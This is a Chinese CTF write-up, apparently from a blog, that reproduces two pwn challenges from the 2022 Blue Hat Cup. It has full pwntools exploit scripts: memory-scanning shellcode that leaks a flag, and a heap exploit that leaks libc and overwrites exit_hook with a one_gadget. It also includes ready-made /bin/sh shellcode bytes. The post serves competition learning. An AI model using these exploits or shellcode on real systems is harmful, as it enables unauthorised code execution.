---
title: 2022 蓝帽杯初赛 pwn 复现
date: 2022-07-10 02:54:59 +0800
categories:
  - ctf比赛
tags:
  - pwn
  - ctf
permalink: /posts/id=30/
pin: false
published:
---

## escape_shellcode(PIE+无libc/orw+shellcode爆破读取)

![image-20220710092803063](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220710092803063.png)

![image-20220710113202330](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220710113202330.png)

题目把flag读在bss段上，没给libc还开了pie，开了一个7权限的堆块区域0x2000，可以对堆块写0x100，执行之前会执行把除了rip其他寄存器清零的shellcode

![image-20220710092821892](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220710092821892.png)

注意的点，堆地址高5位和基地址相同，从基地址开始0x1000地读

```python
# _*_ coding:utf-8 _*_
from pwn import *
context.log_level='debug'
context(arch='amd64', os='linux')

p = process("./escape_shellcode")
elf = ELF("./escape_shellcode")
libc = elf.libc

def dbg():
    gdb.attach(p)

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

base=0x500000000000

shell='''
mov rdi,1
mov rsi,{}
mov rdx,0x1000
mov r14,0xfffff0000000
mov r15,0x1000
mov rax,1
syscall


mov rsi,rcx
and rsi,r14
add rsi,r15
add r15,0x1000
jmp $-0x19
'''.format(base)

p.send(asm(shell))

p.recvuntil("flag{")
flag = 'flag{'+p.recvuntil("}")
print(flag)
```

## Bank(exit_hook)

![image-20220710112051939](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220710112051939.png)

程序比较复杂，IDA解析也有点小问题，但可以看汇编。漏洞点在于

![image-20220710112202729](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220710112202729.png)

取钱操作中，如果取的钱和bank里的钱一致，不会减掉bank里的钱，就可以刷钱了，这里要多刷一点，因为在tran函数中的各个功能函数的参数是我们读入的钱数，如果钱少就执行不了。特别是任意地址泄露这个功能，这里我们可能要取很大的值。

![image-20220710112457335](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220710112457335.png)

利用思路是abyss函数可以实现一个edit的效果，只需要在bss变量这个堆里写入exit_hook，再改为one即可，难点在于libc地址的泄露，需要利用题目的任意地址free功能，用0x20的堆做一个堆合并，泄露main_arena。

![image-20220710112635037](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20220710112635037.png)

```python
# _*_ coding:utf-8 _*_
from pwn import *
context.log_level='debug'
context(arch='amd64', os='linux')

p = process("./Bank")
elf = ELF("./Bank")
libc = elf.libc

def dbg(code=''):
    gdb.attach(p,code)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))
#-----------------------------------------------------------------------------------------

def cmd(choice):
    sla("Click: ",choice)

def Deposit(num):
    cmd("Deposit")
    sla("How Much? ",num)

def Put(num):
    cmd("Put")
    sla("How Much? ",num)

def Info():
    cmd("Info")

def Login(card, pwd):
    cmd("Login")
    sla(": ",card)
    sla(": ",pwd)

def Transfer(who,num):
    cmd("Transfer")
    sla("who? ",who)
    sla("How much? ",num)

# malloc_0x18[num]
def ReadHeap(num):
    Transfer("admin", num)

def FreeAddr(addr):
    Transfer("hacker", 0x33)
    sla("hacker: Great!\n",addr)

def Malloc_0x10(data):
    Transfer("guest", 6)
    p.sendafter("data: ",data)

def Realloc(size):
    Transfer("ghost", 0xB)
    sla('ghost: &^%$#@!   :)\n',size)

# malloc_0x18 = addr
def edit(addr):
    Transfer("abyss", 0)
    p.sendline(str(addr))

#---------------------------------------------------
Login("0"*0x10, "0"*0x6)

cash= 0x100
mycash = 0x203010
bankcash = 0x2030A8

for i in range(0x30):
    Put(cash)
    Deposit(cash)
    Put(cash)
    cash*=2

for i in range(8):
    Malloc_0x10(str(i)*0x10)

Realloc(0x100)
Realloc(0x1)
ReadHeap(0x148/8)
p.recvuntil("0x")
heap_base = int(p.recv(12),16)-0x10
lg("heap_base")

Malloc_0x10(p64(0)+p64(0x421))
for i in range(35):
    Malloc_0x10(p64(0)+p64(0x21))

FreeAddr(heap_base+0x4d0+0x10)# 0x420
ReadHeap(0x240/8) 
p.recvuntil("0x")
libc_base =int(p.recv(12),16)-0x1ebbe0
lg('libc_base')

rtld_global_addr = libc_base+libc.sym['_rtld_global']
lg('rtld_global_addr')
ReadHeap(((rtld_global_addr-(heap_base+0x2a0))/8))
p.recvuntil("0x")
rtld_global = int(p.recv(12),16)
lg("rtld_global")
exit_hook = rtld_global+3848
lg("exit_hook")
one = libc_base+0xe6c7e
#-------------------------------------------------------------


FreeAddr(heap_base+0x2a0)
Malloc_0x10(p64(exit_hook)*2)
edit(one)
p.interactive()
```

